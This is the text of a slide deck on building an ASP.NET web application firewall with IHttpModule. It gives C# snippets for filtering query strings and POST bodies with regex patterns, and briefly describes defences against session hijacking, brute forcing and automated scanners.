  • Example GET & POST http://192.168.131.3/dvds4less/details.aspx?id=1 POST /dvds4less/checkout_form.aspx HTTP/1.1 Host: 192.168.131.3 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20040910 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0. 9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Attack points Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://192.168.131.3/dvds4less/cart.aspx?id=1&quantity=1 Cookie: ASP.NET_SessionId=0zrvzp45nzb1sj45piri0f55 Content-Type: application/x-www-form-urlencoded Content-Length: 60 product_id_0=1&quantity_0=1&order_num=513745&submit=Checkout Shreeraj Shah
  • Trapping HTTP request • Using ProcessRequest we can trap incoming HTTP request. • Code for application defense can be plugged in there. public void ProcessRequest (object o, EventArgs ea) { HttpApplication app = (HttpApplication) o; Shreeraj Shah
  • Processing Query String • Defending query string with Regex routine string querystring = app.Request.ServerVariables["QUERY_STRING"]; if(query.Length > 0) { for(int j=0;j<query.Length;j++) { string[] q = setPattern(querystring,query[j],0); if(q.Length>0) { app.Response.Write("Security Error"); app.Response.End(); } } } Shreeraj Shah
  • Processing POST • Getting hook to POST request bytes. string postreq = ""; if(app.Request.ServerVariables["REQUEST_METHOD"] == "POST") { long streamLength = app.Request.InputStream.Length; byte[] contentBytes = new byte[streamLength]; app.Request.InputStream.Read(contentBytes, 0, (int)streamLength); postreq = System.Text.Encoding.UTF8.GetString(contentBytes); app.Request.InputStream.Position = 0; Shreeraj Shah
  • Processing POST • Processing POST request bytes. if(post.Length > 0) { for(int k=0;k<post.Length;k++) { string[] p = setPattern(postreq,post[k],0); if(p.Length>0) { app.Response.Write("Security Error"); app.Response.End(); } } } Shreeraj Shah
  • Deploying web application firewall • Put dll in /bin folder. • Add following lines into your web.config file. • Web application firewall get loaded. <httpModules> <add type=“firewall.WebAppWall, WebAppMod" name="WebAppWall" /> </httpModules> Shreeraj Shah
  • Impact of web application wall Before After Shreeraj Shah
  • Defense strategies All security attributes can be guarded G by firewall. We can log or provide IDS using G same module Some of the deployment parameters G can be implemented using this method. IHttpHandler can be developed in G similar way. Shreeraj Shah
  • Session management Session object can be used in HTTP G pipeline and session can be strengthen. Session hijacking is common issue G and critical problem with security. IHttpHandler or Module can be used G to provides solid defense against it. Shreeraj Shah
  • Application Bruteforcing Application has forms and via that G username and password get sent using POST. Application bruteforcing is common G attack type. HttpModule can capture these G attacks and on count basis this attack can be avoided. Shreeraj Shah
  • Automated attacks Automated web application attack G tools are out there. Crawling the site and then launch G attacks. This can be avoided by setting “honey traps” using HttpModule. Once it is trapped attacker can be G put into infinite loop using defense trick. Shreeraj Shah
  • Browser catching Detecting browser using HttpModule. G Making sure request is coming from G browser by java script processing and cookie handling. Interesting trick. G Shreeraj Shah
  • Papers Assessing Web App Security with Mozilla http://www.oreillynet.com/pub/a/security/2005/10/20/web_vulnerabilities.html Securing Web Services with mod_security http://www.oreillynet.com/pub/a/onlamp/2005/06/09/wss_security.html Web Services – Attacks and Defense http://www.infosecwriters.com/texts.php?op=display&id=235 Web Application Footprints and Discovery http://www.infosecwriters.com/texts.php?op=display&id=259 Web application defense at the gates – Leveraging IHttpModule http://www.infosecwriters.com/texts.php?op=display&id=276 Web Services: Enumeration and Profiling http://www.infosecwriters.com/texts.php?op=display&id=278 Domain Footprinting for Web Applications and Web Services http://www.infosecwriters.com/texts.php?op=display&id=292 Browser Identification for Web Applications http://www.infosecwriters.com/texts.php?op=display&id=297 Microsoft ASP.NET Web Services & Secure coding Unhandled exception leads to file system disclosure and SQL injection. http://net-square.com/advisory/NS-051805-ASPNET.pdf Shreeraj Shah
  • Thanks! shreeraj@net-square.com Shreeraj Shah